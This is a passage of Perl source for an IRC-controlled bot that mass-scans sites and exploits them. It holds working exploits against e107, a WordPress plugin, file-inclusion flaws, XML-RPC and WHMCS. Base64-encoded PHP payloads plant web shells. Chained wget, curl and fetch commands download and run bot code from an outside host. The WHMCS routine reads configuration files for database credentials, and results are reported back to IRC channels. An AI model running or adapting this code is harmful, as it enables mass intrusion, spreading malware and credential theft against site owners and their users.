T3AvZmJCNWdhVlJjaFIwa1ZWemZqRTN6VlBObFArRmthS2Q3K1ZET0xCb051N3VQWlQ1STdjZTdmdDlt S1BteHV0QjZhWVFWTEZOWXJRTGhpMWMyY0VqOGFnLzBMY3Y4WjB3K0Z5WmRZYkRQR3RSRE4rdDZidXgz OWZ4WU51WmRYdk9zQlZjV1pBWUpJUk5DZDhnc0NDcGhyZFkrUGEySEFEUm5GWmk5Mk1BdlF6NHl5WlFK YWVFU2FGeUtpM3lIOEJlYVBIbHFKMkpabWVnL3ZCMFhhY25QZEJiMlBRT3ozRkIwTEFUNjdvQzZnTEFO blFSNVpIVXhCa0twUWV6VGtwcUwrb3lHYS95ZEhKVmg5MXFuaW05MDFWWS9Jem8zNTgzaHZHSzFNRmJy bVA3OGlFNUlRSHFhU3p6eE1qQzBWRTRIcUVMVUpyRzU4UnhXWDBwemtVd3RGSDYyVS9EQnVtZ0xPbW1C dmV2VkVES2grb1ZxT3U0WVlqa0drdHdVK0N1TWtVUDFoT1duYWV2MGdLdEJnSi9hWVpSMkxId2ZQWnEx UjYyYkhQRU8vZjIwbHljTCtaM3kveDhOcFlac0dwbVYwenVsZEhNcVdydytnTmp2dmR5MjVsMnYwcnZq ZzZqejA3a0JsSW1xRjFpVHJwSFYrZHh4ZkRwTi9yRGIzYkFJZXNJQk9xd2t5NWt3dVNCYkJ4ekl4WDZw cmNCZHBUemtiYmN2NExCMnYvU0FPODd3WVlRT2xISU56UldlZjA4TDdLQmRwT3ZK cEl2Qk02VEhRazdkZlVRNFBIQWhhY2IvL1M2QU5YVWc2SDlQdFUrd0hnSVE0V0VRUGNDVlFMNHhZSWt3 ck9PTUkrRHFEQUJBVEFpclpQdngzZzluaHdYSUVCbEVPeExMS2Vpams4Z29kU2lBQ2p5VVU1K1Y2NW10 YXI0cG1qZzREWUhITkYyWU41cjdzWlNqelZZNDJnWlFiQmtIYXBaNWE1SFpjYWtYakFTUlVwTFhJcGxH TDAyMTdvMmY2enFpMmp5eW0zcXZiT25rUlZxaXZKa1pFRUFHSE85V1JTWVp1N2x2OG94TTNOLzRrQjZK OEhxUU1aeWp5Z1dSYW9NQ3NjbUw0MGFob2lsb01JNDhPWENUMFdVazVyMWhEWWJyeXNOTkx6a2xOTDA2 OGFJOE5raE5NaXcrdmFUalVxMkVYdi9HRDBRUExLdnQ4RFBqU1pIVzBINjVsRk9DRHJvcWhselZlNDdD MWhKeU9hTkprMzVaaDMvcU9FcTlKWk56cHlPYlZ5aEFiOXJKb3B5ekxLNjNtVnkzME5NQWI3VFhwdDA3 emlPdVpVNSszRkxDN296RTN2bzlVa1Nmd2JOcDMxM2g5b0hFRjA1Z0dqTkNkWFVwcXNHYmdrZUIwZTZR VzNydUExYlVvMnFtN3MybWJHelVHdHJGTEd6R1V2bHpPdzFiSnNORFpvT21EMGRSVnBCNXVsTzdqMkds ZThXOEJNa08zRFR6elF4R3luVEc4QS9nOWFaMFFtemd6MjdTS2J3SWFway9rbHJsbTFZWTgwWFFHWElz M01YbXRQWVEyak5mMmdWMGI0MjRrMGlJTHYzY0h5Mmo5TytBQTkyWFo3VTJYZDlBM0xNQ09Xc2sxTWNm YWlBcXR6SlNYMEswWk53WDB5U3BvVzNsZTZuVVhTMVMxMXVvVlZWMXluR00vUVpDcmEyOTE5aDZTWW1h ZHFGdTljK1NacmUzWWVOdmFyUHNNbWhpdm4wK0UzIikpKTsKJGZpY2hpZXIgPSBm b3BlbignLi9pbWFnZXMvbG9nLnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgk ZmljaGllcik7Cg=="; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code ."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7);
my $res = $ua->request($req); return $res->content; } sub e107_spread_query() { my $url = $_[0]; my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxi cj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3O2NkIC90bXA7cm0gLXJmIGRvci4qICoudHh0Lio7ZmV0 Y2ggaHR0cDovL3F1aXpjcmV3Lm5ldC9wZXJsLmpwZztwZXJsIHBlcmwuanBnO3JtIC1yZiBwZXJsLmpw Zzt3Z2V0IGh0dHA6Ly9xdWl6Y3Jldy5uZXQvcGVybC5qcGc7cGVybCBwZXJsLmpwZztybSAtcmYgcGVy bC5qcGc7Y3VybCAtTyBodHRwOi8vcXVpemNyZXcubmV0L3BlcmwuanBnO3BlcmwgcGVybC5qcGc7cm0g LXJmIHBlcmwuanBnO2x3cC1kb3dubG9hZCBodHRwOi8vcXVpemNyZXcubmV0L3BlcmwuanBnO3Blcmwg cGVybC5qcGc7Y2QgL3Zhci90bXA7cm0gLXJmIGRvci4qICouanBnLio7ZmV0Y2ggaHR0cDovL3F1aXpj cmV3Lm5ldC9wZXJsLmpwZztwZXJsIHBlcmwuanBnO3JtIC1yZiBwZXJsLmpwZzt3Z2V0IGh0dHA6Ly9x dWl6Y3Jldy5uZXQvcGVybC5qcGc7cGVybCBwZXJsLmpwZztybSAtcmYgcGVybC5qcGc7Y3VybCAtTyBo dHRwOi8vcXVpemNyZXcubmV0L3BlcmwuanBnO3BlcmwgcGVybC5qcGc7cm0gLXJmIHBlcmwuanBnO2x3 cC1kb3dubG9hZCBodHRwOi8vcXVpemNyZXcubmV0L3BlcmwuanBnO3BlcmwgcGVybC5qcGc7IjsNCiRl c2VndWljbWQ9ZXgoJGNtZCk7ZWNobyAkZXNlZ3VpY21kOw0KZnVuY3Rpb24gZXgoJGNmZSl7DQokcmVz ID0gJyc7DQppZiAoIWVtcHR5KCRjZmUpKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygn ZXhlYycpKXsNCkBleGVjKCRjZmUsJHJlcyk7DQokcmVzID0gam9pbigiXG4iLCRyZXMpOw0KfQ0KZWxz ZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsNCiRyZXMgPSBAc2hlbGxfZXhlYygkY2Zl KTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsNCkBvYl9zdGFydCgpOw0KQHN5 c3RlbSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9 DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCkBvYl9zdGFydCgpOw0KQHBhc3N0 aHJ1KCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0N CmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3BvcGVuJykpew0KJGYgPSBAcG9wZW4oJGNmZSwiciIpOw0K d2hpbGUoIUBmZW9mKCRjZmUpKSB7ICRyZXMgLj0gQGZyZWFkKCRjZmUsMTAyNCk7IH0NCkBwY2xvc2Uo JGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=="; my $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$ code."'))%3Bdie%28%29%3B%5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); } sub ih_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$ihlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$ihlogo6$engine 12Finished") ; } my $ihxxx = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGV jb2RlKCJ4VWw2UXVNNEVQNThWZndINCtzcXFSWVNTK21rRlRUc1pSQ1dWd2ZsMm1WZkFGSmg0cmFHeEk 1NWgyRVA4ZDlxZVNkOVRHazVRVTJKVjBpVG1YVGVIcytNMi9sSFFjdk5EVktWYjRJblZ4T3AvZmJCNWd hVlJjaFIwa1ZWemZqRTN6VlBObFArRmthS2Q3K1ZET0xCb051N3VQWlQ1STdjZTdmdDltS1BteHV0QjZ hWVFWTEZOWXJRTGhpMWMyY0VqOGFnLzBMY3Y4WjB3K0Z5WmRZYkRQR3RSRE4rdDZidXgzOWZ4WU51WmR Ydk9zQlZjV1pBWUpJUk5DZDhnc0NDcGhyZFkrUGEySEFEUm5GWmk5Mk1BdlF6NHl5WlFKYWVFU2FGeUt pM3lIOEJlYVBIbHFKMkpabWVnL3ZCMFhhY25QZEJiMlBRT3ozRkIwTEFUNjdvQzZnTEFOblFSNVpIVXh Ca0twUWV6VGtwcUwrb3lHYS95ZEhKVmg5MXFuaW05MDFWWS9Jem8zNTgzaHZHSzFNRmJybVA3OGlFNUl RSHFhU3p6eE1qQzBWRTRIcUVMVUpyRzU4UnhXWDBwemtVd3RGSDYyVS9EQnVtZ0xPbW1CdmV2VkVES2g
rb1ZxT3U0WVlqa0drdHdVK0N1TWtVUDFoT1duYWV2MGdLdEJnSi9hWVpSMkxId2ZQWnExUjYyYkhQRU8 vZjIwbHljTCtaM3kveDhOcFlac0dwbVYwenVsZEhNcVdydytnTmp2dmR5MjVsMnYwcnZqZzZqejA3a0J sSW1xRjFpVHJwSFYrZHh4ZkRwTi9yRGIzYkFJZXNJQk9xd2t5NWt3dVNCYkJ4ekl4WDZwcmNCZHBUemt iYmN2NExCMnYvU0FPODd3WVlRT2xISU56UldlZjA4TDdLQmRwT3ZKcEl2Qk02VEhRazdkZlVRNFBIQWh hY2Iv L1M2QU5YVWc2SDlQdFUrd0hnSVE0V0VRUGNDVlFMNHhZSWt3ck9PTUkrRHFEQUJBVEFpclpQdngzZzlu aHdYSUVCbEVPeExMS2Vpams4Z29kU2lBQ2p5VVU1K1Y2NW10YXI0cG1qZzREWUhITkYyWU41cjdzWlNq elZZNDJnWlFiQmtIYXBaNWE1SFpjYWtYakFTUlVwTFhJcGxHTDAyMTdvMmY2enFpMmp5eW0zcXZiT25r UlZxaXZKa1pFRUFHSE85V1JTWVp1N2x2OG94TTNOLzRrQjZKOEhxUU1aeWp5Z1dSYW9NQ3NjbUw0MGFo b2lsb01JNDhPWENUMFdVazVyMWhEWWJyeXNOTkx6a2xOTDA2OGFJOE5raE5NaXcrdmFUalVxMkVYdi9H RDBRUExLdnQ4RFBqU1pIVzBINjVsRk9DRHJvcWhselZlNDdDMWhKeU9hTkprMzVaaDMvcU9FcTlKWk56 cHlPYlZ5aEFiOXJKb3B5ekxLNjNtVnkzME5NQWI3VFhwdDA3emlPdVpVNSszRkxDN296RTN2bzlVa1Nm d2JOcDMxM2g5b0hFRjA1Z0dqTkNkWFVwcXNHYmdrZUIwZTZRVzNydUExYlVvMnFtN3MybWJHelVHdHJG TEd6R1V2bHpPdzFiSnNORFpvT21EMGRSVnBCNXVsTzdqMkdsZThXOEJNa08zRFR6elF4R3luVEc4QS9n OWFaMFFtemd6MjdTS2J3SWFway9rbHJsbTFZWTgwWFFHWElzM01YbXRQWVEyak5mMmdWMGI0MjRrMGlJ THYzY0h5Mmo5TytBQTkyWFo3VTJYZDlBM0xNQ09Xc2sxTWNmYWlBcXR6SlNYMEswWk53WDB5U3BvVzNs ZTZuVVhTMVMxMXVvVlZWMXluR00vUVpDcmEyOTE5aDZTWW1hZHFGdTljK1NacmUzWWVOdmFyUHNNbWhp dm4wK0UzIikpKTsKJGZpY2hpZXIgPSBmb3BlbignLi9sb2cucGhwJywndycpOwpm d3JpdGUoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTsK"; my $ihcek = "JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwo KZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK"; my $vuln = "http://".$site.$bug."?action=log-reset&type= ih_options();eval(base64_decode(".$ihxxx."));error"; my $cekih = "http://".$site.$bug."?action=log-reset&type =ih_options();eval(base64_decode(".$ihcek."));error"; my $shell = "http://".$site."wp-content/plugins/is-human /log.php"; my $coba = &get_content($cekih); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($coba =~ /Array<br>(.*?)<br>(.*?)gid=/){ my $uname = $1; my $uid = $2; &get_content($vuln);sleep(1); &msg("$chan","$ihlogo6$engine 12Exploitasi 15http://$site "); my $res = &get_content($shell);sleep(1); if ($res =~ /kulo - nuwun/){ &msg("$chan","$ihlogo6$engine12 sH eLL6 $shell "); } else { &msg("$chan","$ihlogo6$e ngine12 Vuln12 $site Os=$uname $uid"); } } } exit; } } } } sub rfi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$rfilogo6$engine 12Finished"
); } my $coba = "http://".$site.$bug."test??"; my $test = "http://".$site.$bug.$injector."??"; my $dor = "http://".$site.$bug.$botshell."??"; my $cek = &get_content($coba); if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { &get_content($dor);sleep(1); if ($cek =~ /failed to open stream/) { my $check = &get_content($test);sleep(1) ; if ($check =~ /vito-RawckerheaD/i) { &os2($test,$chan,$engine,$rfilog o); } } } exit; } } } } sub lfi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$lfilogo6$engine 12Finished" ); } my $dir = "../../../../../../../../../../../../../../../ ../../../../../../../../../"; my $test = "http://".$site.$bug.$dir."/proc/self/environ %0000"; my $shell = "http://".$site.$bug.$dir."/tmp/kulo%0000"; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTT P_USER_AGENT/) { my $res = lfi_env_query($test); # &lfi_spread_query($test); if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS /) { my $os = $1; my $uid = $2; my $lficheck = &get_content($she ll); if ($lficheck =~ /kulo - nuwun/) { &msg("$chan","$lfilogo6$e ngine12 sHeLL6 $shell 15(OS=$os) $uid "); } else { &msg("$chan","$lfilogo6$e
ngine12 Vuln12 $site 15(OS=$os) $uid "); } } } } exit; } } } } sub lfi_env_query() { my $url = $_[0]; my $code = 'JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWxkUXVOVEZI MHVFdjl1bUZPeW93V0hla2gyQldScEtURWxkeUUwUWZvQ3lHWHNWaktMUGJaenhuRkd4SC92dlROcFZa YUYwbmZ6RXVmZVpyL09uTGxCOTNDNUtHcHFGRWFLRnlKRk9wYmFlaC92N2pBcEN4bFdTUlpGWmpGcUQ5 SElkTVRkNDFjeDdiYWlNQWpEd2ZEeTJwbkduK003NTdiZC91RnVhcWRvenhYWFZrUUpXbnhsQ0U2dEpa dkNJd2FNL2dwVDEvUjhQTDZLem9maG1ONmltNHZQVys1RThPY2tDTWZSY1RTd2dIYVJyZ0JPNHpRbXEw dk1DVkd3VVpNYmdha3huaUpaeFRPV0g2WU1vSis0NE5FY3VtZlFHT1ZTeXB4by8zaGdtenkwRkZncXlm VUswb2NuZEU1bk1ld0hrR0JyYVZPUEg0R0ZXYkZLUTVjQU1xV1pMSm4wb2VLaVEyMjZFbVRPM1BWUmp2 Mk9RZnI5RWRCSHo4enVaeUVoeVZoT28rQnZPQTQyZ3ZLWWRDNjFzOE9oeEJJaVA4M1I2aVZTUWZjSk5W blJmVzBlSzU2UlgvRkxiMDRXVFpkVW5VSERGYkRXakdZakJrb2tjZktlYmlQMUZEZUNnR2hEbHdGbTB5 czFuVDg3OXZxVW44aHRobXYzenJERWRHRWpuZCtDOGJXVGNZVmdLQnRIalNvcW1iQmFIVGpoNlhWak5Z N09CbjhFbHljWGdYQzBrREtsT2ZHZlEvM2g2ZVFpdUJ4VW8rRmo3Tnh0dExNc0Q3aFZzZ3FnK0t4clhu UE1BNW1qVnlTek5OdHQrOFFtZWRzQnZxT0VqdDRrb1NNcklRQWxpNExRcnVZNmNMMkorRjBVV0U0T1ZY VnRKK0dDY2t5M2NMMDRVZzJmRldQSkZQK2IrVCtScE1qZ3RINzhZRDY5N3JSVXZX aGFqMms3UnJCV0U5d0NjRWZCYnZ2VXBSNk1HSUVCYTlIRzZMWTkybjU0alFrRXdCQVZRbjJUS1YvQkkz RkxsL0FvbVQ4NTUxODdOOXR0UmowOFBDaFY4VGlqeWh4eWV6dk5yQktKaGtoVHlpVVVJNml0Y1puYWU1 YWd5U3F4U1BsWFdFd1d5bEwvdnROa2pCQ05lQTk5R1JQRzFUNXJqdzdKWnlVRlRvc0g0T1p4SHpic1Ur VzEvVnNsWVdIK1dBMUF2MXlrTG9TVU9VQ1p6RmFPZUFTWXZzSzlWMi9EZ1VKMjcyaFBRb3M4ajFMYUVO amxvcXcwMGF1UytVZXpMNW9TNU5pblZwN1NlbUpMV21iKzVMZHNLTG1QczhyOHZnTjhCenZyT2NmYm5U STRJSk1pcnpMTldHdmhHTnhPR3V1NDZid1pCNmY1bHhFbWNrbkVLVG5qR1ROd1p4RDllWm9GUWtZbTZt R1Y3WDBMTUlQNDJvM2F4SiswcnZuQmMzdTFpMWkyTk5GVWNiT0pqZnpJcG8xKy8xaGRWTEFsUGtPU2Ni RkZ2bzYzQW5tVHRZOUI5WnBiTy9BV3ZSdXJGUm03YVhsanMxd3JFNUZsM1BMbDB4M1llSmsrbXBpNkhR aHRNQTZ6akdUN2h0ZEJVSWxtQ3pnRE1qck1pM3NXMmV3c2pSRGdmak5SNTNKeHcyRGpycnZ4V1ptNm1l K1NDcWUxZTZSRUJid2RUSXA3NFpIWVVsbTIvRzZWSlBEWGgzVXdiRituZytWbzFDZjBtRHlhMi9hTTVF MzBEY3RqVkF4eXRUTkN6UnVyWG5pbGNac0srcmxFMEtINXdMSkp1T01qOW9VbExuTXlXODJLcUlPeFov TVZXUDVVUlNkRzVDQ0xuUmNTZit6OUF3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcvdG1wL2xvYmV4 JywndycpOwpmd3JpdGUoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTsK '; my $ua = LWP::UserAgent->new(agent => "<?echo 'c0li#'.php_uname().'#c0li'.ge t_current_user();eval(base64_decode('".$code."'));echo 'SUCCESS';?>"); $ua->timeout(7); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } sub xml_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$xmllogo6$engine 12Finished" ); } my $test = "http://".$site.$bug;
my $vuln = "http://".$site."12".$bug; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /faultcode/i ) { my $resp = &xml_cek_query2($test); if ($resp =~ /Byroe(.*)KuLo/s) { &xml_spread_query($test);sleep(1); my $sys = $1; my $shell = "http://".$site."/log.php"; my $check = &get_content($shell); if ($check =~ /kulo - nuwun/) { my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1
;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","$xmllogo6$engine12 sHeLL6 $shell15 (Sa feMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$xmllogo6$engine12 sHeLL6 $shell15 (S afeMode=$safe) (OS=$os) uid=$uid "); } # else { # &msg("$chan","0,1$xmllogo(4@8$engine15)15(13@12SysTem15)1 0 ".$vuln." 3".$sys); sleep(1);} } } } exit; } } } } sub xml_cek_query() { my $url = $_[0]; my $code = "system('uname -a');"; my $ua = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name> </value></param></params></methodCall>"; $ua->timeout(7); my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit); return $res->content; } sub xml_cek_query2() { my $url = $_[0]; my $string = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UX VOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92ek s2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZH k1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG 9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3 FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1 paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdW F1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC 91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MD RDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNT
hQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNH JQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRk F0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQ ThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrR VJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlM TlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51e Hoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOS lR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kb XVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qS kVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1S nhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPV UE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFER S9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5T FhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQ XlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmlja GllciA9IGZvcGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyL CAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg=="; my $ua = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode(' $string'));echo 'KuLo';exit;/*</name></value></param></params></methodCall>"; $ua->timeout(7); my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit); return $res->content; } sub xml_spread_query() { my $xmltargt = $_[0]; my $xmlsprd = "system('wget ".$injector." -O log.php;fetch ".$injector.";mv bat .txt log.php;wget ".$md5bot." -O tmp.php;fetch ".$md5bot.";mv bot.txt tmp.php;ki llall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$md5bot.";php bot.txt;rm -rf bot.txt;wget ".$md5bot.";php bot.txt;rm -rf bot.txt;curl -O ".$md 5bot.";php bot.txt;rm -rf bot.txt;lwp-download ".$md5bot.";php bot.txt;cd /var/t mp;rm -rf dor.* *.jpg.*;fetch ".$md5bot.";php bot.txt;rm -rf bot.txt;wget ".$md5 bot.";php bot.txt;rm -rf bot.txt;curl -O ".$md5bot.";php bot.txt;rm -rf bot.txt; lwp-download ".$md5bot.";php bot.txt;');"; my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></pa ram></params></methodCall>"; $userAgent->timeout(7); my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', C ontent => $exploit); } sub thumb_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$thumblogo); my $num = scalar(@totexploit); if ($num > 0){
foreach my $site(@totexploit){ $count++; my $vuln = "http://".$site.$bug; my $botis = "http://".$site.$bug; my $botxc = "http://".$site.$bug; my @nbug = split(/\//,$bug); my $cek = &get_content($vuln); if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { if ($cek =~ /Saving your image/i){ &msg("$chan","$thumblogo15$engine SHELL 9h ttp://".$site."/administrator/components/com_jnewsletter/includes/openflashchart /php-ofc-library/ofc_upload_image.php"); my $pdir = $2; if ($spreadMode == 1) { &get_content($bo tis); &get_content($botxc);sleep(1); } my $crut = "http://".$site.$nbug[0].$pdi r.$md5php; my $botc = "http://".$site.$nbug[0].$pdi r.$md5bot; my $botpc = "http://".$site.$nbug[0].$pd ir.$md5botx; my $npath = "http://".$site."/administra tor/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_uploa d_image.php"; my $check = &get_content($crut."?clone") ;sleep(1); if ($check =~ /Saving your image/i){ my $safe = ""; my $os = ""; my $ uid = ""; if ($check =~ m/SAFE_MODE: <b><f ont color=blue>(.*?)<\/font>/) {$safe = $1;} if ($check =~ m/color=red><b>&nb sp; (.*?)<br>/) {$os = $1;} if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;} my $crot = &get_content($npath); sleep(1); if ($crot =~ /Saving your image/ i){ &msg("$admin","$thumblog o6$engine8 sHeLL4 ".$npath."0 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chanxxx","$thumbl ogo6$engine8 sHeLL4 ".$npath."0 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$admin","$thumblog o6$engine8 sHeLL ".$crut."0 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$thumblogo6 $engine8 sHeLL4 ".$crut."0 (SafeMode=$safe) (OS=$os) uid=$uid "); } &get_content($botc);sleep(1); &get_content($botpc);sleep(1); } } } exit; } if ($count == $num-1) { &msg("$chan","$thumblogo4$engine0 0Selesai......4! ") ; } } } }
sub whmcs_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$whmcslogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$whmcslogo6$engine 12Finished"); } my $test1 = "http://".$site.$bug."../../../configuration .php%00"; my $submit = "http://".$site.$subticket; my $html = &get_content($test1); if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { if ($html =~ /db_host/i) { my $userpass = &getUserPass($html); sleep(2); my $info = &getinfo($html); sleep(2); &msg("$chaninfo","$whmcslogo6$engine12 info 15[ 6htt p://".$site."15 